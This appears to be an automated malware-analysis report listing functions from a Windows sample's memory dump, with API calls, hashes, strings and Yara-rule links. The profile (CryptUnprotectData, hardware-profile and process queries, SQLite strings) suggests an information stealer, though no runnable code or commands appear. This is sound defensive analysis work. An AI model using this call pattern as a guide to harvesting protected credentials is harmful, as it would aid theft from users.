String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: 0ae3c1b48dfd237ceedb241e5c509d4292c0685f4b54f83be53492b99dc7d62c
Instruction ID: f3144821c85a426eb57cb42337321211df6be9b4418fb5f9bd87335f55164839
Opcode Fuzzy Hash: 0ae3c1b48dfd237ceedb241e5c509d4292c0685f4b54f83be53492b99dc7d62c
Instruction Fuzzy Hash: 2531B132310610ABD6349E5C998491BEBEDEBA6752B200D3FF081D73D1C779DD4483A9

Uniqueness

Uniqueness Score: -1.00%

Function 0049BB6D, Relevance: 4.6, APIs: 3, Instructions: 74COMMON

Download Yara Rule

APIs

std::_Xfsopen.LIBCPMT ref: 0049BB25
std::_Xfsopen.LIBCPMT ref: 0049BB41
_fseek.LIBCMT ref: 0049BB58

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Xfsopenstd::_$_fseek
String ID:
API String ID: 1675860589-0
Opcode ID: 0bbbabea576089d255a41a4a16e95bd6f14b0b852e35b21abb365bd5d854cda0
Instruction ID: 6e03f1c9c023a1bb6e96eb0dbc9276985dc70b8243a825ee657704252d1381d9
Opcode Fuzzy Hash: 0bbbabea576089d255a41a4a16e95bd6f14b0b852e35b21abb365bd5d854cda0
Instruction Fuzzy Hash: 46110432A012096BEF240555BE42F7B3E88EB10790F180036FE45966D9EB2DEC0286DD

Uniqueness

Uniqueness Score: -1.00%

Function 004950D0, Relevance: 4.5, APIs: 3, Instructions: 47COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 00495104
GetModuleFileNameExA.PSAPI(00000000,00000000,00000000,00000104), ref: 0049511D
CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 00495123

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: c16e5d8e8deea9b80635a2ca5df9f6899f8c4f3a798f08682587a1a9c8f5a6ca
Instruction ID: 923f72fdfaffd53d35f629cac38de5ac80fc882379c23ed5e915f2576bc59404
Opcode Fuzzy Hash: c16e5d8e8deea9b80635a2ca5df9f6899f8c4f3a798f08682587a1a9c8f5a6ca
Instruction Fuzzy Hash: C001D231208301AFD321DF18D806BEBBBE8EB98704F00092EF58587280DBB89448C7E6

Uniqueness

Uniqueness Score: -1.00%

Function 00414C90, Relevance: 4.5, APIs: 3, Instructions: 42fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,00000000,751881D0,0040524C,?,00000000), ref: 00414CB7
WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00414CE3
CloseHandle.KERNEL32(00000000), ref: 00414CEA

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID:
API String ID: 1065093856-0
Opcode ID: 22a5ad6fb972835ff29a39c35de5eacc8fdd7b04dd25e7983903f42dd1430e72
Instruction ID: 7c9b1b86db29d077eea8834f21ce44fe0ab945c4bda4cf9008310446598d7ad7
Opcode Fuzzy Hash: 22a5ad6fb972835ff29a39c35de5eacc8fdd7b04dd25e7983903f42dd1430e72
Instruction Fuzzy Hash: 94F06872215210BFE350DA5CEC49FD7B398FB98720F01472AF641965D0D7B4A8D5C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00491090, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

GetCurrentHwProfileA.ADVAPI32 ref: 004910B9

Strings

Unknown, xrefs: 004910F3

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CurrentProfile
String ID: Unknown
API String ID: 2104809126-1654365787
Opcode ID: c8191daa23f04e2e674e54d1434ef376ef539dedb6e11d01e00ae4d0af2722ec
Instruction ID: 1dca38e6d33bbff110bfa5f00d950b97ce549fd1d44997843e736f11a701c109
Opcode Fuzzy Hash: c8191daa23f04e2e674e54d1434ef376ef539dedb6e11d01e00ae4d0af2722ec
Instruction Fuzzy Hash: 7201AD702083439FEB20CF14C955BA7BBE8FB94344F00C82EE4C587290EB799508C79A

Uniqueness

Uniqueness Score: -1.00%

Function 00498EE0, Relevance: 3.1, APIs: 2, Instructions: 70fileCOMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00498F18
ReadFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,?,00499019,?,00004000,?,00000000,?,00000000,0049AD75), ref: 00498F58

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead_memmove
String ID:
API String ID: 1325644223-0
Opcode ID: 458ee74fd2b4527d9e389d1507e420d8e07e8e23c39b124dd1e1b850e9fa2a03
Instruction ID: 22f8bd3c63c0c8d62a1a3667792a107d0147ca9fcb685651b91fc586e4ac01e1
Opcode Fuzzy Hash: 458ee74fd2b4527d9e389d1507e420d8e07e8e23c39b124dd1e1b850e9fa2a03
Instruction Fuzzy Hash: DC113076700B009FE720DA6AD884E6BBBE9EBD5755F14482EF295C7211DA30EC048775

Uniqueness

Uniqueness Score: -1.00%

Function 004998E0, Relevance: 3.1, APIs: 2, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,00000000,0049A7CC,?,00000000,00000000,00000010,00000000), ref: 00499924

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: cdc1c6167063303ea431aedcc57b2ed6f6fd16707f01f04caeed30ab34470481
Instruction ID: ffb083f055a5d4f45eea38dd66a30a454ab90c570d03346e7828a5fe316b079d
Opcode Fuzzy Hash: cdc1c6167063303ea431aedcc57b2ed6f6fd16707f01f04caeed30ab34470481
Instruction Fuzzy Hash: 90018CB26017046FD720AE7DA8C4BA7FBDCE799365F10463FF255D2250CA715C448628

Uniqueness

Uniqueness Score: -1.00%

Function 00417A90, Relevance: 3.1, APIs: 2, Instructions: 53COMMON

Download Yara Rule

APIs

Part of subcall function 00417940: __CxxThrowException@8.LIBCMT ref: 00417963
Part of subcall function 00417940: std::exception::exception.LIBCMT ref: 0041798C
Part of subcall function 00417940: __CxxThrowException@8.LIBCMT ref: 004179AB
Part of subcall function 00417940: std::exception::exception.LIBCMT ref: 004179CD
Part of subcall function 00417940: __CxxThrowException@8.LIBCMT ref: 004179EC
Part of subcall function 00417940: std::exception::exception.LIBCMT ref: 00417A09
Part of subcall function 00417940: __CxxThrowException@8.LIBCMT ref: 00417A28

Part of subcall function 0049C971: _malloc.LIBCMT ref: 0049C98B

std::locale::_Init.LIBCPMT ref: 00417AD6

Part of subcall function 0049B80D: __EH_prolog3.LIBCMT ref: 0049B814
Part of subcall function 0049B80D: std::_Lockit::_Lockit.LIBCPMT ref: 0049B82A
Part of subcall function 0049B80D: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0049B84C
Part of subcall function 0049B80D: std::locale::_Setgloballocale.LIBCPMT ref: 0049B856
Part of subcall function 0049B80D: _Yarn.LIBCPMT ref: 0049B86C

std::_Lockit::_Lockit.LIBCPMT ref: 00417AE9

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Exception@8Throw$std::exception::exceptionstd::locale::_$LockitLockit::_std::_$H_prolog3InitLocimpLocimp::_SetgloballocaleYarn_malloc
String ID:
API String ID: 353226162-0
Opcode ID: 37ac05ae1c48f4c714365df593e8291d23aac844341f809c0db200c6251be105
Instruction ID: 66ab37376330f0e637e7d1dd310f7dc9464125287f4a6c42c280003405ceb1fa
Opcode Fuzzy Hash: 37ac05ae1c48f4c714365df593e8291d23aac844341f809c0db200c6251be105
Instruction Fuzzy Hash: 25018BB19007008FD720AF6BE98459BFBF8FFD0328B100A2FE49682A51D7B4A5048B94

Uniqueness

Uniqueness Score: -1.00%

Function 0049CE8E, Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 004A284D: __getptd_noexit.LIBCMT ref: 004A284D

__lock_file.LIBCMT ref: 0049CED5

Part of subcall function 0049EF03: __lock.LIBCMT ref: 0049EF28

__fclose_nolock.LIBCMT ref: 0049CEE0

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: c33f17dc16e716d29f44a449a954cdf2558f2731f3c10b0fa2b5c6e9486229b6
Instruction ID: 31e64612cf3375bf0150db2a0dc749f147d9f732d8ab72768d4a3f3751f10d02
Opcode Fuzzy Hash: c33f17dc16e716d29f44a449a954cdf2558f2731f3c10b0fa2b5c6e9486229b6
Instruction Fuzzy Hash: FBF096318417059ADF10AB7A884275F7FA06F11339F20C22FB432AA1D1C77C4A016B9D

Uniqueness

Uniqueness Score: -1.00%

Function 004A63F3, Relevance: 3.0, APIs: 2, Instructions: 18COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 004A640B

Part of subcall function 004A7639: __mtinitlocknum.LIBCMT ref: 004A764F
Part of subcall function 004A7639: __amsg_exit.LIBCMT ref: 004A765B
Part of subcall function 004A7639: EnterCriticalSection.KERNEL32(00000000,00000000,?,004A4DFA,0000000D), ref: 004A7663

__tzset_nolock.LIBCMT ref: 004A641C

Part of subcall function 004A5D12: __lock.LIBCMT ref: 004A5D34
Part of subcall function 004A5D12: ____lc_codepage_func.LIBCMT ref: 004A5D7B
Part of subcall function 004A5D12: __getenv_helper_nolock.LIBCMT ref: 004A5D9D
Part of subcall function 004A5D12: _free.LIBCMT ref: 004A5DD4
Part of subcall function 004A5D12: _strlen.LIBCMT ref: 004A5DDB
Part of subcall function 004A5D12: __malloc_crt.LIBCMT ref: 004A5DE2
Part of subcall function 004A5D12: _strlen.LIBCMT ref: 004A5DF8
Part of subcall function 004A5D12: _strcpy_s.LIBCMT ref: 004A5E06
Part of subcall function 004A5D12: __invoke_watson.LIBCMT ref: 004A5E1B
Part of subcall function 004A5D12: _free.LIBCMT ref: 004A5E2A

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
String ID:
API String ID: 1828324828-0
Opcode ID: 2c7759da07163d0620f212d98fc2714713d20de4d2b9561a2e9f2aa4cadc7c34
Instruction ID: 5868344c79461e480f457c81e9a1887bbbfc9f2663a845c77fdb8bd9ba21c61a
Opcode Fuzzy Hash: 2c7759da07163d0620f212d98fc2714713d20de4d2b9561a2e9f2aa4cadc7c34
Instruction Fuzzy Hash: 93E0C231842720A7C6227BAAAB0234D73A07B7AB25F64822FB040215C2CAB80981D65D

Uniqueness

Uniqueness Score: -1.00%

Function 004AB3F6, Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004A0B78,00000000,?,00000000,00000000,00000000,?,004A4E8F,00000001,00000214,?,?), ref: 004AB439

Part of subcall function 004A284D: __getptd_noexit.LIBCMT ref: 004A284D

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: 0ad2d8c7dc44aff3a8b917ed81c8241a9261df5c2c174084947612e321cff378
Instruction ID: a04db9638a1dee0b1ca6a23852cada495cbb4116754694e9136b679fe552be70
Opcode Fuzzy Hash: 0ad2d8c7dc44aff3a8b917ed81c8241a9261df5c2c174084947612e321cff378
Instruction Fuzzy Hash: 1F01B5312016159BEB249F25EC14B673754EBB7761F01863BE8158A2A3DB78C800C698

Uniqueness

Uniqueness Score: -1.00%

Function 0049C8FA, Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __getptd_noexit
String ID:
API String ID: 3074181302-0
Opcode ID: fc899726d2284161bb9a275b3a32003df2bcf134b6456aa17b34dfff90e5a6b9
Instruction ID: 73a843ba85b622630630e3307d8d3660591aeae519c689488efc643ed4aa55c1
Opcode Fuzzy Hash: fc899726d2284161bb9a275b3a32003df2bcf134b6456aa17b34dfff90e5a6b9
Instruction Fuzzy Hash: 37F0F9718001049BCF113FE58C0179A3F545F22374F00431BF938492E1C7BC85509BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00498AE0, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06682f03a9d9260599c3e9bd4f1919b332d036b398f894f7b156e68adb775249
Instruction ID: 6f0cb9f37ba81ca47b7e300d3c919b845df81cd92f906857202970f50d09c58f
Opcode Fuzzy Hash: 06682f03a9d9260599c3e9bd4f1919b332d036b398f894f7b156e68adb775249
Instruction Fuzzy Hash: 6DF030F0101240ABDF54CF14C689B577BD4AB62748F6481AEE1044F282CB76D817DB68

Uniqueness

Uniqueness Score: -1.00%

Function 004130A0, Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(?,00000000), ref: 004130D3

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 68d1b6f156d717fe8b664c64203827557463007132c5613207a7f936db7a7c20
Instruction ID: 6b57ad14742c48277dcf7efde6e2e4432b88e2174e8ed7a650ab099214070f68
Opcode Fuzzy Hash: 68d1b6f156d717fe8b664c64203827557463007132c5613207a7f936db7a7c20
Instruction Fuzzy Hash: 80F05E71614300DFEB14EF55D982A5BB7E8EB98300F808C2EF49A87141E739E558CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 004A3496, Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

__flsbuf.LIBCMT ref: 004A34B7

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __flsbuf
String ID:
API String ID: 2056685748-0
Opcode ID: b2abbf9e15346c5a683e1eb0b284856c540cceb5b9561b4a404859deff5ecdc1
Instruction ID: 6ec9b11de6026d1a2fdf99f279a8c3243d591275fcc4cb9a37cef4498416477c
Opcode Fuzzy Hash: b2abbf9e15346c5a683e1eb0b284856c540cceb5b9561b4a404859deff5ecdc1
Instruction Fuzzy Hash: C3E0123000814099DA264E25E4452717BA4AF6772AB38C6CFE594891E3E63E9586DA54

Uniqueness

Uniqueness Score: -1.00%

Function 00403900, Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SHFileOperationA.SHELL32 ref: 0040393B

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: 4dc6f621c2e5fce55ec6fbad67ce2f3542b3591565184b68cfa5bd339167fdb7
Instruction ID: 3e1e39b8f2c7aed0e11ac81d8090e87450f68906971928e4b61b1ce6291e3849
Opcode Fuzzy Hash: 4dc6f621c2e5fce55ec6fbad67ce2f3542b3591565184b68cfa5bd339167fdb7
Instruction Fuzzy Hash: 2CE05AB09083029FD388DF29D58061ABAE5AF98304F40896EA098C2360E77586588B9B

Uniqueness

Uniqueness Score: -1.00%

Function 00490AB0, Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 00490AC1

Part of subcall function 00496100: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0049629C

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InfoIos_base_dtorSystemstd::ios_base::_
String ID:
API String ID: 1980665618-0
Opcode ID: 02b12a4130044cd33dbdc4af19b162ebf1e655e21adeef7fc83922358ebb47da
Instruction ID: 2c68ce11ac87fae07dd5087aea9a8b6b1572c028a2bbcde26149131d50a09f22
Opcode Fuzzy Hash: 02b12a4130044cd33dbdc4af19b162ebf1e655e21adeef7fc83922358ebb47da
Instruction Fuzzy Hash: 9ED012761052106FC604EB55DC85A9BB7ECFF8C215F00851DF98993200D6349A04CF92

Uniqueness

Uniqueness Score: -1.00%

Function 004933F0, Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0041750C,00000000,00000000,0000001A,0041750C,?,0000001A,?,?,?,?,0000000F,00000010), ref: 0049340B

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: b13a5c7b7f46961dc9a3fe9816c8ce43927792ae1d34f0e8af8a7d0e70865628
Instruction ID: 2c08649641fb06742f57881e150f195761509758b20f382297821fb41fbe30ed
Opcode Fuzzy Hash: b13a5c7b7f46961dc9a3fe9816c8ce43927792ae1d34f0e8af8a7d0e70865628
Instruction Fuzzy Hash: 1DD0CA71344200AFE2808A64CD46F1A7AA8AB44B00F208418B288CA2D0CAB0A8008B25

Uniqueness

Uniqueness Score: -1.00%

Function 004930C0, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000000,004135D4,00000000), ref: 004930C5

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 30e659a931854e3cf2d53265c53d4880cebf9ae12826aad2e82055bac1a9d0db
Instruction ID: 556c0bcd7faa231cf070bff32b0aad96b6ea5f67745edc635b50859c87e30269
Opcode Fuzzy Hash: 30e659a931854e3cf2d53265c53d4880cebf9ae12826aad2e82055bac1a9d0db
Instruction Fuzzy Hash: E4C080752012005FDA00C53C490C60775845F71322F408B31F174C11D4C734DC12C11C

Uniqueness

Uniqueness Score: -1.00%

Function 004930F0, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,00407054,00000000), ref: 004930F5

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 676d990260e0bbe8e320e048b50c65d18da74355b1805e36d0754b4836123928
Instruction ID: 3e7077f9fb780e74dc71aedb263c6d694d872cb189d2722106cd0ec71e4e384d
Opcode Fuzzy Hash: 676d990260e0bbe8e320e048b50c65d18da74355b1805e36d0754b4836123928
Instruction Fuzzy Hash: 17C08C791011001BDA009B388C0DA077B88ABA3322F408B32F564C61E0CB38CC56CA1C

Uniqueness

Uniqueness Score: -1.00%

Function 0049D0CC, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 0049D0D9

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
Instruction ID: 78a7aa5ebaf350bb80f5f098903fddb396e4973d553966da7323cfc732473532
Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
Instruction Fuzzy Hash: 08C09B7244010C77CF112A43DC02E453F1997C0768F054021FB1C191619577D561D589

Uniqueness

Uniqueness Score: -1.00%

Function 0049E19E, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

__fsopen.LIBCMT ref: 0049E1AB

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __fsopen
String ID:
API String ID: 3646066109-0
Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction ID: edfc18b76fa17980e3aaa9d3a417fef139e536e0b1bcf01b7096fdbd81bf3831
Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction Fuzzy Hash: C9C0927344020C77CF112E83EC06E4A3F1A9BD4764F148035FB1C191A1EABBEA619689

Uniqueness

Uniqueness Score: -1.00%

Function 00401020, Relevance: 1.3, APIs: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 0040102C

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 396f8bccee25d2d13d14cc63dfa2d59370f15b9bfe4d72d010eb27a0a46b619a
Instruction ID: 8d912c681a1cb0d4e3387fadef84e7c30b1c09c81ab5ba7f4830e16c1520b8dd
Opcode Fuzzy Hash: 396f8bccee25d2d13d14cc63dfa2d59370f15b9bfe4d72d010eb27a0a46b619a
Instruction Fuzzy Hash: FE01D4312082868FC710CE2C98C4AA7BBD9DF5A304F04406EF9C4D7222D631D80D8755

Uniqueness

Uniqueness Score: -1.00%

Function 00493010, Relevance: 1.3, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?,?,00000000,?,004197BD,?,?), ref: 0049302B

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 59b9700ef3e8b5141901371d9dac3848c48a87ede5a235684b81a3486f4c7abb
Instruction ID: 82cc5cc05d2940e7cda5256f2fbc3dd45439d5d968fd2a4afce76514e3148513
Opcode Fuzzy Hash: 59b9700ef3e8b5141901371d9dac3848c48a87ede5a235684b81a3486f4c7abb
Instruction Fuzzy Hash: 50E02B763016525787228E6D4848A23EF9DDFDAE12B15413FDA44D731FEA29CE0582A4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00416340, Relevance: 7.5, APIs: 5, Instructions: 49encryptionCOMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0041634A

Part of subcall function 0049E04E: __FF_MSGBANNER.LIBCMT ref: 0049E067
Part of subcall function 0049E04E: __NMSG_WRITE.LIBCMT ref: 0049E06E
Part of subcall function 0049E04E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,004A0B2E,00000000,00000001,00000000,?,004A75C4,00000018,004CF090,0000000C,004A7654), ref: 0049E093

_memmove.LIBCMT ref: 00416356
_malloc.LIBCMT ref: 00416364
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00416382
_memmove.LIBCMT ref: 0041639B

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _malloc_memmove$AllocateCryptDataHeapUnprotect
String ID:
API String ID: 2315474888-0
Opcode ID: 7f7afc912a203851ca9c11d7b6f4366c71a1c1766159533b011ba44322897f6b
Instruction ID: 55b456b1d609d108c96d3d53ca0edcb3797dc61457193fa4a3f564db2f42ea8c
Opcode Fuzzy Hash: 7f7afc912a203851ca9c11d7b6f4366c71a1c1766159533b011ba44322897f6b
Instruction Fuzzy Hash: 77F0D6725046606BD710EB2A9C01E9FBBACFFC5714F48096EF89497201E778D50587EA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A030, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?), ref: 0041A124
HeapAlloc.KERNEL32(00000000), ref: 0041A12B
_strcpy_s.LIBCMT ref: 0041A16F

Strings

0123456789ABCDEF, xrefs: 0041A06F

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$AllocProcess_strcpy_s
String ID: 0123456789ABCDEF
API String ID: 3271950656-2554083253
Opcode ID: 962320a5cf3f2f742a439471a4f8ef8816986a898bf610699743ecf579d0f154
Instruction ID: ac267854c1fc9c99e19bcafa3cf76682ae8d8206b5d0d7514fde80c64ef619f8
Opcode Fuzzy Hash: 962320a5cf3f2f742a439471a4f8ef8816986a898bf610699743ecf579d0f154
Instruction Fuzzy Hash: E241B2B65083419FC714CF68DD40AABBBE9AB89304F04463EF895C3391EB38D904CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00439000, Relevance: 6.2, APIs: 4, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8f7de4157c36f8719d9f9f74c85748fd65aaebbb3105be5957cbcc0da3792c8
Instruction ID: 53b7b2d2b2c4905c2ac0d299d96ab2027dd4ae780ca0f01f4653bb5a38bbd229
Opcode Fuzzy Hash: f8f7de4157c36f8719d9f9f74c85748fd65aaebbb3105be5957cbcc0da3792c8
Instruction Fuzzy Hash: 9C81CEB190861AAFDB24DF69D88066777E4FB8C314F04066EEC589B701D3B8ED408BE5

Uniqueness

Uniqueness Score: -1.00%

Function 00416190, Relevance: 6.1, APIs: 4, Instructions: 54encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 004161AE
LocalAlloc.KERNEL32(00000040,00000000), ref: 004161BD
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 004161D1
LocalFree.KERNEL32 ref: 004161E0

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: 8ce3861bb27e82753341bfcaaef7f396d2df4b9013f86946c3848e3a6eddcc3b
Instruction ID: c4eec498ec70fd9006891b49f4d1203c566a17d6254c7c9252314e8d8681e4f8
Opcode Fuzzy Hash: 8ce3861bb27e82753341bfcaaef7f396d2df4b9013f86946c3848e3a6eddcc3b
Instruction Fuzzy Hash: 51014F7130121A7BC3105F6ADC44E97FF9CEF563A6B12002AF984D6250DB72E8408B74

Uniqueness

Uniqueness Score: -1.00%

Function 004690E0, Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 665COMMON

Download Yara Rule

Strings

2ab564bf9655b7c7b97ab85cafc8a48329b27f93, xrefs: 00469121, 004696E9, 00469712, 0046978B, 004697DB
database corruption at line %d of [%.10s], xrefs: 0046912B, 004696F3, 0046971C, 00469795

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: 2ab564bf9655b7c7b97ab85cafc8a48329b27f93$database corruption at line %d of [%.10s]
API String ID: 0-1200375835
Opcode ID: 0f5cf51ae3e301e948eb9b1a8a51e63603f814bf59464e392921d7e1008fabcc
Instruction ID: 5f85b8a01b8bb85e37e93c7cfb3ac508dae01cf4171ab927bd37b77263bc842f
Opcode Fuzzy Hash: 0f5cf51ae3e301e948eb9b1a8a51e63603f814bf59464e392921d7e1008fabcc
Instruction Fuzzy Hash: C9422371A083518FD714DF29C480A2BBBE5AFC5304F18459EE8858B346E7B9EC46CB97

Uniqueness

Uniqueness Score: -1.00%

Function 00450340, Relevance: 2.7, Strings: 2, Instructions: 185COMMON

Download Yara Rule

Strings

2ab564bf9655b7c7b97ab85cafc8a48329b27f93, xrefs: 00450379, 00450543
database corruption at line %d of [%.10s], xrefs: 00450383, 0045054D

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: 2ab564bf9655b7c7b97ab85cafc8a48329b27f93$database corruption at line %d of [%.10s]
API String ID: 0-1200375835
Opcode ID: 18b16e369509344f178fa286afbfb576ac288287cbb7ca688a76b71b79e49eaa
